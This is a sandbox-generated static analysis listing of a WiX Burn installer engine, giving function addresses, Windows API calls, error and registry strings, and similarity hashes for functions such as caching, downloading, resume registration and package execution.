Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: StringType
String ID: @$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
API String ID: 4177115715-289295652
Opcode ID: 528aff217b04fb466cc4f2fe6e56a9b73c2892a36151bca82cd411b82b68807a
Instruction ID: 5c7ccdab760b8b9dd7e6f5ef9e413ecdbe1ef918e57e6206a4b87cb1b67bd00f
Opcode Fuzzy Hash: 528aff217b04fb466cc4f2fe6e56a9b73c2892a36151bca82cd411b82b68807a
Instruction Fuzzy Hash: 58E1E671A0470AEBDB318FA1C849FBBBBF4FB4170CF28461DE1925A580D3B5AA84D750

Function 00C95BC5 Relevance: 35.2, APIs: 4, Strings: 16, Instructions: 222COMMON

Download Yara Rule

Strings

Detect, xrefs: 00C95C80
Invalid value for @Action: %ls, xrefs: 00C95DB0
Failed to get @Action., xrefs: 00C95E03
Failed to get next RelatedBundle element., xrefs: 00C95DFC
Failed to resize Upgrade code array in registration, xrefs: 00C95E18
Failed to get RelatedBundle nodes, xrefs: 00C95BF5
Failed to get RelatedBundle element count., xrefs: 00C95C12
Upgrade, xrefs: 00C95CC8
Patch, xrefs: 00C95D55
Failed to resize Patch code array in registration, xrefs: 00C95E26
RelatedBundle, xrefs: 00C95BD3
Addon, xrefs: 00C95D10
Action, xrefs: 00C95C44
Failed to resize Addon code array in registration, xrefs: 00C95E1F
Failed to resize Detect code array in registration, xrefs: 00C95E11
Failed to get @Id., xrefs: 00C95E0A

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID:
String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade
API String ID: 0-3660206225
Opcode ID: 8aa92057a5fbc0e366961e08549eaf7695977a60372943ded4afd11ee26e776c
Instruction ID: e3c6355772bc373d90b28ea852f161847e04988e14ca78cb88f5112c392c69de
Opcode Fuzzy Hash: 8aa92057a5fbc0e366961e08549eaf7695977a60372943ded4afd11ee26e776c
Instruction Fuzzy Hash: E871A175640B09FFDB12DA90CD89FAE77B9EB45744F204428F552AB280DB35EE42DB10

Function 00C9C3AE Relevance: 33.6, APIs: 6, Strings: 13, Instructions: 354synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00C9BBD1: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,00C9DA59,?,00000000,75C0B390,?,00000000), ref: 00C9BBE0
Part of subcall function 00C9BBD1: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 00C9BBED
Part of subcall function 00C9BBD1: LeaveCriticalSection.KERNEL32(?,?,00C9DA59,?,00000000,75C0B390,?,00000000), ref: 00C9BC02

ReleaseMutex.KERNEL32(?,00C9138B,00000000,?,00C913BB,00000001,00000000), ref: 00C9C791
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00C91303,?,?,00C9180F), ref: 00C9C79A
CloseHandle.KERNEL32(?,00C9138B,00000000,?,00C913BB,00000001,00000000), ref: 00C9C7B9

Part of subcall function 00CB17CE: SetThreadExecutionState.KERNEL32(80000001), ref: 00CB17D3

Strings

Failed to create cache thread., xrefs: 00C9C681
Posted message to parent process to signal that the parent process can stop waiting, xrefs: 00C9C603
Failed to cache engine to working directory., xrefs: 00C9C52F
core.cpp, xrefs: 00C9C452, 00C9C677
UX aborted apply begin., xrefs: 00C9C45C
Failed while caching, aborting execution., xrefs: 00C9C69D
Another per-user setup is already executing., xrefs: 00C9C49D
Failed to send completion over the pipe., xrefs: 00C9C5F9
Failed to register bundle., xrefs: 00C9C5B2
Failed to elevate., xrefs: 00C9C553
Engine cannot start apply because it is busy with another action., xrefs: 00C9C40C
Another per-machine setup is already executing., xrefs: 00C9C58D
Failed to set initial apply variables., xrefs: 00C9C4C7

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseCriticalHandleSection$CompareEnterExchangeExecutionInterlockedLeaveMutexReleaseStateThread
String ID: Another per-machine setup is already executing.$Another per-user setup is already executing.$Engine cannot start apply because it is busy with another action.$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to send completion over the pipe.$Failed to set initial apply variables.$Failed while caching, aborting execution.$Posted message to parent process to signal that the parent process can stop waiting$UX aborted apply begin.$core.cpp
API String ID: 1740103319-3198874528
Opcode ID: 5b45429f09ceb6c49fa122f5711c8ec7c5b326fef09f6bdc85a2b710f167cf9e
Instruction ID: 237c86b30eaec89c24816d0283a7c9c0d168082b4c3e2dfaa669c748a2e6469d
Opcode Fuzzy Hash: 5b45429f09ceb6c49fa122f5711c8ec7c5b326fef09f6bdc85a2b710f167cf9e
Instruction Fuzzy Hash: 9DC162B2900605EFDF20AFA0CDC9EFEB7B9AB54301F54443EF266A2141DB315A45EB51

Function 00CB58B0 Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 189COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,00CB3EB0,00000000), ref: 00CB58BC
_memset.LIBCMT ref: 00CB58D7
CloseHandle.KERNEL32(00CAACBD,00000000,00CB5814,00CB5B07,?,?,?,?,00000000,?,?,00000001,?), ref: 00CB5A7C
CloseHandle.KERNEL32(?,00000000,00CB5814,00CB5B07,?,?,?,?,00000000,?,?,00000001,?), ref: 00CB5A89
CloseHandle.KERNEL32(?,00000000,00CB5814,00CB5B07,?,?,?,?,00000000,?,?,00000001,?), ref: 00CB5AA3

Part of subcall function 00C935AD: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 00C935DA
Part of subcall function 00C935AD: GetLastError.KERNEL32(00000000,00C917A9,00C9BDAF,00C9130D,?), ref: 00C935E3
Part of subcall function 00C935AD: LocalFree.KERNEL32(?,00C9130D), ref: 00C93746

Strings

Failed to create embedded pipe name and client token., xrefs: 00CB5937
Failed to allocate embedded command., xrefs: 00CB5983
Failed to wait for embedded process to connect to pipe., xrefs: 00CB5A0F
Failed to wait for embedded executable: %ls, xrefs: 00CB5A60
Failed to create embedded pipe., xrefs: 00CB5955
Failed to create embedded process atpath: %ls, xrefs: 00CB59E4
burn.embedded, xrefs: 00CB591F
Failed to process messages from embedded message., xrefs: 00CB5A31
burn.embedded.async, xrefs: 00CB5915, 00CB596B
embedded.cpp, xrefs: 00CB59D7
%ls -%ls %ls %ls %u, xrefs: 00CB596F

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseHandle$DescriptorSecurity$ConvertCurrentErrorFreeLastLocalProcessString_memset
String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process atpath: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$burn.embedded.async$embedded.cpp
API String ID: 1195026954-3691304899
Opcode ID: fcf8f9e7b5f516064d3d221fa7c3e5db0203f0072bb6e43df2723eadef36217f
Instruction ID: 99040e1cee2eef99dab00a76bc1448517ab979f9be955715aa3495de1e17dfc0
Opcode Fuzzy Hash: fcf8f9e7b5f516064d3d221fa7c3e5db0203f0072bb6e43df2723eadef36217f
Instruction Fuzzy Hash: CD517C72E40619FBCF11EFE4CC86EEEBBB9AF08B10F100526F601B6151D7718A45AB91

Function 00CA7F05 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 206fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00C9130D,40000000,00000005,00000000,00000002,08000080,00000000,00000000,00000000,00000000,00C9130D,00C917A5,?,00C91355,?,00000000), ref: 00CA7F44
GetLastError.KERNEL32(?,00C9130D,?,?,00C9180F,?,?,?,00C91E12,?), ref: 00CA7F52

Part of subcall function 00CC5E5C: ReadFile.KERNEL32(?,?,?,?,00000000,00000000,75C0B390,00000000,?,00CA7FCF,?,?,?,00000000,00000000,?), ref: 00CC5EF8

SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00CA8001
GetLastError.KERNEL32(?,00C9130D,?,?,00C9180F,?,?,?,00C91E12,?), ref: 00CA800B
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00C9130D,?,?,00C9180F), ref: 00CA8145

Strings

Failed to seek to beginning of engine file: %ls, xrefs: 00CA7FAC
Failed to copy engine from: %ls to: %ls, xrefs: 00CA7FDB
cache.cpp, xrefs: 00CA7F77, 00CA8030, 00CA809B, 00CA8110
Failed to seek to original data in exe burn section header., xrefs: 00CA811A
Failed to seek to checksum in exe header., xrefs: 00CA803A
Failed to zero out original data offset., xrefs: 00CA8135
Failed to create engine file at path: %ls, xrefs: 00CA7F84
Failed to seek to signature table in exe header., xrefs: 00CA80A5
Failed to update signature offset., xrefs: 00CA8058

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: File$ErrorLast$CloseCreateHandlePointerRead
String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cache.cpp
API String ID: 3456208997-3092846023
Opcode ID: c6dbcd2925de3f53cd2c30819e7c461db9cd26105c77424049974ed909b81c96
Instruction ID: de52ea90b2d7fae87b7a44519670ba50bf1ba69f2fa05feabd065d24faef0d31
Opcode Fuzzy Hash: c6dbcd2925de3f53cd2c30819e7c461db9cd26105c77424049974ed909b81c96
Instruction Fuzzy Hash: ED5104B264010ABFEB10AAA4CC86F7F77B9EB45749F140139F311E6190DF358D49A721

Function 00CA6459 Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 172windowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC7ABB: GdiplusStartup.GDIPLUS(?,?,?,00000000,?,00CA64B0,?,?,?), ref: 00CC7AC8

LoadCursorW.USER32(00000000,00007F00), ref: 00CA64F8
RegisterClassW.USER32(?), ref: 00CA650C
GetLastError.KERNEL32 ref: 00CA6517
CreateWindowExW.USER32(00000080,00CD7634,?,90000000,?,?,?,?,00000000,00000000,?,?), ref: 00CA657D
GetLastError.KERNEL32 ref: 00CA658A
SetEvent.KERNEL32(?), ref: 00CA65CD
IsDialogMessageW.USER32(?,?), ref: 00CA65E7
TranslateMessage.USER32(?), ref: 00CA65F5
DispatchMessageW.USER32(?), ref: 00CA65FF
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CA660C
UnregisterClassW.USER32(WixBurnSplashScreen,?), ref: 00CA6632

Strings

Unexpected return value from message pump., xrefs: 00CA6619
WixBurnSplashScreen, xrefs: 00CA6505, 00CA662D
splashscreen.cpp, xrefs: 00CA6541, 00CA65B4
Failed to initialize GDI+., xrefs: 00CA64BA
Failed to load splash screen., xrefs: 00CA64DE
Failed to create window., xrefs: 00CA65BE
Failed to register window., xrefs: 00CA654B

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Message$ClassErrorLast$CreateCursorDialogDispatchEventGdiplusLoadRegisterStartupTranslateUnregisterWindow
String ID: Failed to create window.$Failed to initialize GDI+.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp
API String ID: 515895837-4030304179
Opcode ID: d72708da1e8b292b9a303d1847491184bb177e454c65d225bb0f05f28b6008b1
Instruction ID: a5232e6d957440ef424860c03b1b1bea2118a7d4398316657698875d1d29b314
Opcode Fuzzy Hash: d72708da1e8b292b9a303d1847491184bb177e454c65d225bb0f05f28b6008b1
Instruction Fuzzy Hash: 695159B290021AEFCB10DFE4CD49AEDBBB9FF09704F24452AF215E6160D7759A44DB90

Function 00C968E9 Relevance: 31.7, APIs: 3, Strings: 15, Instructions: 166registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000,00000000,00000000,?,?), ref: 00C96AED

Part of subcall function 00CC3C9B: RegSetValueExW.ADVAPI32(?,00020006,00000000,00000004,00C96938,00000004,00000001,?,00C96938,00020006,Resume,00C913BB,00000000,00000000,?,?), ref: 00CC3CB0

Strings

"%ls" /%ls, xrefs: 00C96990
registration.cpp, xrefs: 00C96A74, 00C96ABF
Failed to write resume command line value., xrefs: 00C96A0C
Failed to write Resume value., xrefs: 00C9693E
Failed to write Installed value., xrefs: 00C96962
Failed to format resume command line for RunOnce., xrefs: 00C969A4
Installed, xrefs: 00C9694F
Failed to write run key value., xrefs: 00C969E8
BundleResumeCommandLine, xrefs: 00C969F5, 00C96A8D
burn.runonce, xrefs: 00C96985
Resume, xrefs: 00C9692B
Failed to delete run key value., xrefs: 00C96A7E
Failed to create run key., xrefs: 00C969CA
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00C969B7, 00C96A1F
Failed to delete resume command line value., xrefs: 00C96AC9

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseValue
String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$burn.runonce$registration.cpp
API String ID: 3132538880-3648537543
Opcode ID: 4cab16c1304064fcd9a26914467fe30cb3f182a30497f519cc785a6123efb983
Instruction ID: 6657d8a93372772e5d4340bd6a6adfb2b42ef9c1381e0cb309877ebeb6bfebbd
Opcode Fuzzy Hash: 4cab16c1304064fcd9a26914467fe30cb3f182a30497f519cc785a6123efb983
Instruction Fuzzy Hash: 7251F631580705BADF229AA0CC4EF6E7676AB80B50F25C03DF415B61E1DFB5CB91B610

Function 00CB38CC Relevance: 30.0, APIs: 4, Strings: 13, Instructions: 210threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,?,?,?,?,00CB3DF8,00000001,00000000,000000B9,00000000,?), ref: 00CB3925
GetExitCodeThread.KERNEL32(?,00000001,?,?,?,?,00CB3DF8,00000001,00000000,000000B9,00000000,?,?,?,000000B9,00000000), ref: 00CB3941
GetLastError.KERNEL32(?,?,?,?,00CB3DF8,00000001,00000000,000000B9,00000000,?,?,?,000000B9,00000000,00000001,00000000), ref: 00CB394F
GetLastError.KERNEL32(?,?,?,?,00CB3DF8,00000001,00000000,000000B9,00000000,?,?,?,000000B9,00000000,00000001,00000000), ref: 00CB3B15

Strings

Invalid execute action., xrefs: 00CB3AE8
Failed to execute MSU package., xrefs: 00CB3A3D
Failed to execute dependency action., xrefs: 00CB3A73
Failed to execute MSI package., xrefs: 00CB39DD
Failed to get cache thread exit code., xrefs: 00CB3983
Failed to wait for cache check-point., xrefs: 00CB3B49
Failed to execute MSP package., xrefs: 00CB3A08
apply.cpp, xrefs: 00CB3979, 00CB3B3F
Cache thread exited unexpectedly., xrefs: 00CB3B0B
Failed to execute compatible package action., xrefs: 00CB3AAD
Failed to load compatible package on per-machine package., xrefs: 00CB3A99
Failed to execute EXE package., xrefs: 00CB39B2
Failed to execute package provider registration action., xrefs: 00CB3A58

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
API String ID: 3703294532-2662572847
Opcode ID: 9c29ef243b4bce7de6cd894cdca1273335c238f5f734d5e48fa4ad571c802604
Instruction ID: ff0a467a07e92e9a8b6c3d41faa2326e58e419185c4967db0fb268f498b6d80c
Opcode Fuzzy Hash: 9c29ef243b4bce7de6cd894cdca1273335c238f5f734d5e48fa4ad571c802604
Instruction Fuzzy Hash: DE714771A0424AFB9F05CFA9CD41AEE7BB9AF44700F20406AF956E7290E771DB40AB50

Function 00C98067 Relevance: 30.0, APIs: 2, Strings: 15, Instructions: 208COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00C980DC
_MREFOpen@16.MSPDB140-MSVCRT ref: 00C98202

Strings

Failed to format upgrade code string., xrefs: 00C980E7
State, xrefs: 00C980AA
Failed to format product code string., xrefs: 00C98211
No products found for UpgradeCode: %ls, xrefs: 00C98124
Failed to get product info., xrefs: 00C981EE
Failed to set variable., xrefs: 00C98275
Trying per-user extended info for property '%ls' for product: %ls, xrefs: 00C9818F
Language, xrefs: 00C980B3
Trying per-machine extended info for property '%ls' for product: %ls, xrefs: 00C98161
Failed to find product for UpgradeCode: %ls, xrefs: 00C9810E
Unsupported product search type: %u, xrefs: 00C9809A
Product not found: %ls, xrefs: 00C981BA
VersionString, xrefs: 00C980BC
Failed to change value type., xrefs: 00C98257
MsiProductSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 00C98285

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Open@16
String ID: Failed to change value type.$Failed to find product for UpgradeCode: %ls$Failed to format product code string.$Failed to format upgrade code string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$No products found for UpgradeCode: %ls$Product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
API String ID: 3613110473-2367264253
Opcode ID: 75811459e123f654984e3d4e34b368d659a6dbefc81a3070032d6c73b00d351d
Instruction ID: 22101424c0d8dd6da190806a7ed2064a30b3eb75a32d9cffcd6875fa28370f90
Opcode Fuzzy Hash: 75811459e123f654984e3d4e34b368d659a6dbefc81a3070032d6c73b00d351d
Instruction Fuzzy Hash: 7B61DD72D40929FBDF129F94CC0AFADBA75EB05700F10806DE910BB191DB758F5AAB90

Function 00CB75D3 Relevance: 30.0, APIs: 10, Strings: 7, Instructions: 205networkfilememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000004,00000000,00000004,00000080,00000000,?,00000000,?,?,?,000000FF,?), ref: 00CB760B
GetLastError.KERNEL32 ref: 00CB7619
VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 00CB766B
GetLastError.KERNEL32 ref: 00CB7678
InternetCloseHandle.WININET(00000000), ref: 00CB7707
InternetCloseHandle.WININET(?), ref: 00CB7718
InternetCloseHandle.WININET(?), ref: 00CB77FB
InternetCloseHandle.WININET(00000000), ref: 00CB7809
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00CB782A
CloseHandle.KERNEL32(000000FF), ref: 00CB7839

Strings

Failed to allocate buffer to download files into., xrefs: 00CB76A7
Failed while reading from internet and writing to: %ls, xrefs: 00CB77E4
downloadengine.cpp, xrefs: 00CB763E, 00CB769D
Failed to request URL for download: %ls, xrefs: 00CB77DA
Failed to create download destination file: %ls, xrefs: 00CB764B
GET, xrefs: 00CB7739
Failed to allocate range request header., xrefs: 00CB77C9

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseHandle$Internet$ErrorLastVirtual$AllocCreateFileFree
String ID: Failed to allocate buffer to download files into.$Failed to allocate range request header.$Failed to create download destination file: %ls$Failed to request URL for download: %ls$Failed while reading from internet and writing to: %ls$GET$downloadengine.cpp
API String ID: 424062026-2629732388
Opcode ID: a9b70c4f55813e5147c1d5dee8581c6d04a098bf46589f01ec01db2a321e2244
Instruction ID: 877a4b0806ccb5bf123da6693631d2afd35c5294ae4b03c94a414f60e01ba5ff
Opcode Fuzzy Hash: a9b70c4f55813e5147c1d5dee8581c6d04a098bf46589f01ec01db2a321e2244
Instruction Fuzzy Hash: 9C71487280425AEBCF119F94CC86EED7BB5BB48315F15423AFA11B21A0D7358E80EB91

Function 00C96AFB Relevance: 29.9, APIs: 1, Strings: 16, Instructions: 144registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000), ref: 00C96C69

Part of subcall function 00CC4173: RegSetValueExW.ADVAPI32(00020006,?,00000000,00000001,?,00000000,?,000000FF,00000000,00000001,?,?,00C969E2,00000000,?,00020006), ref: 00CC41A6

Strings

Publisher, xrefs: 00C96B9F, 00C96BA4
PublishingGroup, xrefs: 00C96BBE, 00C96BC3
PackageName, xrefs: 00C96B71, 00C96B76
UninstallString, xrefs: 00C96B0B
PackageVersion, xrefs: 00C96B88, 00C96B8D
InstalledDate, xrefs: 00C96C09, 00C96C0E
InstallerVersion, xrefs: 00C96C39, 00C96C3E, 00C96C3F, 00C96C4F
InstallerName, xrefs: 00C96C23, 00C96C28, 00C96C29
Failed to get the formatted key path for update registration., xrefs: 00C96B1B
ReleaseType, xrefs: 00C96BD8, 00C96BDD
Failed to create the key for update registration., xrefs: 00C96B3C
LogonUser, xrefs: 00C96BF5
Date, xrefs: 00C96C0F
Failed to write %ls value., xrefs: 00C96C50
ThisVersionInstalled, xrefs: 00C96B54, 00C96B59, 00C96B68
InstalledBy, xrefs: 00C96BEF, 00C96BF4

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseValue
String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled$UninstallString
API String ID: 3132538880-2375234059
Opcode ID: 3ac4ccde39d3d48873f61dcf168d222c263dfe38e16c06f3449fd6e1089be540
Instruction ID: 149ce305dcf60b636bea223c50715886d91d9e78bfac59cc179671914612c1a4
Opcode Fuzzy Hash: 3ac4ccde39d3d48873f61dcf168d222c263dfe38e16c06f3449fd6e1089be540
Instruction Fuzzy Hash: D841A272900619BBCF126660CC5AF5FBA7ADF907A0B25007CF555A3361EB31DE41B660

Function 00C918B9 Relevance: 28.2, APIs: 4, Strings: 12, Instructions: 185windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00C91AC3
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C91AD6
CloseHandle.KERNEL32(00000000,?,?,?,00C91E12,?), ref: 00C91AE5

Strings

Failed while running , xrefs: 00C91A75
Failed to create the message window., xrefs: 00C919E3
Failed to query registration., xrefs: 00C919F9
Failed to set action variables., xrefs: 00C91A0F
Failed to check global conditions, xrefs: 00C91997
Failed to create pipes to connect to elevated parent process., xrefs: 00C91935
Failed to set layout directory variable to value provided from command-line., xrefs: 00C91A51
Failed to connect to elevated parent process., xrefs: 00C9194B
WixBundleLayoutDirectory, xrefs: 00C91A40
Failed to initialize internal cache functionality., xrefs: 00C9190A
